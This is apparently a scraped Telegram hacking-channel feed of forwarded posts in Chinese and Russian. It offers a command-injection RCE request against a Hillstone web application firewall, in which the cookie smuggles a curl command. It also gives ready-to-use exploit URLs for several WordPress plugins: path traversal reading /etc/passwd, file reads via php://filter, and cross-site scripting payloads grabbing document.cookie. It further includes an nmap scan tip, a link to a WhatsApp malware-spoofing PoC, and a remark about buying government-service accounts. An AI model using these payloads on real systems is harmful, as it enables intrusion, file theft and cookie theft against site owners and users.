Forwarded from 御魂Hacker_🇨🇳-军火库 (黑 大帅🇨🇳)
山石网科应用防火墙WAF RCE
GET /rest/captcha HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en;q=0.9
Cookie: PHPSESSID=aaaaaaaaaa%3bcurl${IFS}url%3bd
curl${IFS}url
#exploit #poc
GET /rest/captcha HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en;q=0.9
Cookie: PHPSESSID=aaaaaaaaaa%3bcurl${IFS}url%3bd
curl${IFS}url
#exploit #poc
Forwarded from Proxy Bar
Forwarded from Proxy Bar
Прекрасное в мире плагинов WordPress
*
simple-image-manipulator
activehelper-livehelp
amministrazione-aperta
anti-plagiarism
buddypress-component-stats
dzs-videogallery
e-search
fancy-product-designer
hd-webplayer
localize-my-post
*
simple-image-manipulator
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd
activehelper-livehelp
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
amministrazione-aperta
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd
anti-plagiarism
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
buddypress-component-stats
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
dzs-videogallery
/wp-content/plugins/dzs-videogallery/admin/upload.php
e-search
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
fancy-product-designer
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
hd-webplayer
/wp-content/plugins/hd-webplayer/playlist.php
localize-my-post
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
Forwarded from Codeby
Сканер nmap 👁
Сетевой сканер Nmap был, есть и будет самым популярным сетевым сканером.
Nmap - очень важный инструмент предоставления информации об удалённом узле.
Благодаря ему можно узнать информацию о запущенных сервисах на узле и порт на котором работает сервис. Если нужен подробный отчёт, тогда используйте опции
Команда🖥
Сетевой сканер Nmap был, есть и будет самым популярным сетевым сканером.
Nmap - очень важный инструмент предоставления информации об удалённом узле.
Благодаря ему можно узнать информацию о запущенных сервисах на узле и порт на котором работает сервис. Если нужен подробный отчёт, тогда используйте опции
-T4 -A -v
это так называемое интенсивное сканирование.
Команда
nmap -T4 -A -v <IP>
Please open Telegram to view this post
VIEW IN TELEGRAM
Family RIN
Video
GitHub
WhatsApp-extension-manipulation-PoC/wp.py at main · 0x6rss/WhatsApp-extension-manipulation-PoC
Android malware (.apk) can be spread through a fake PDF document by manipulating the file extension in the WhatsApp application. PoC is available in this repo - 0x6rss/WhatsApp-extension-manipulati...
Почему сейчас стало настолько тяжело купить простой аккаунт госуслуг?👺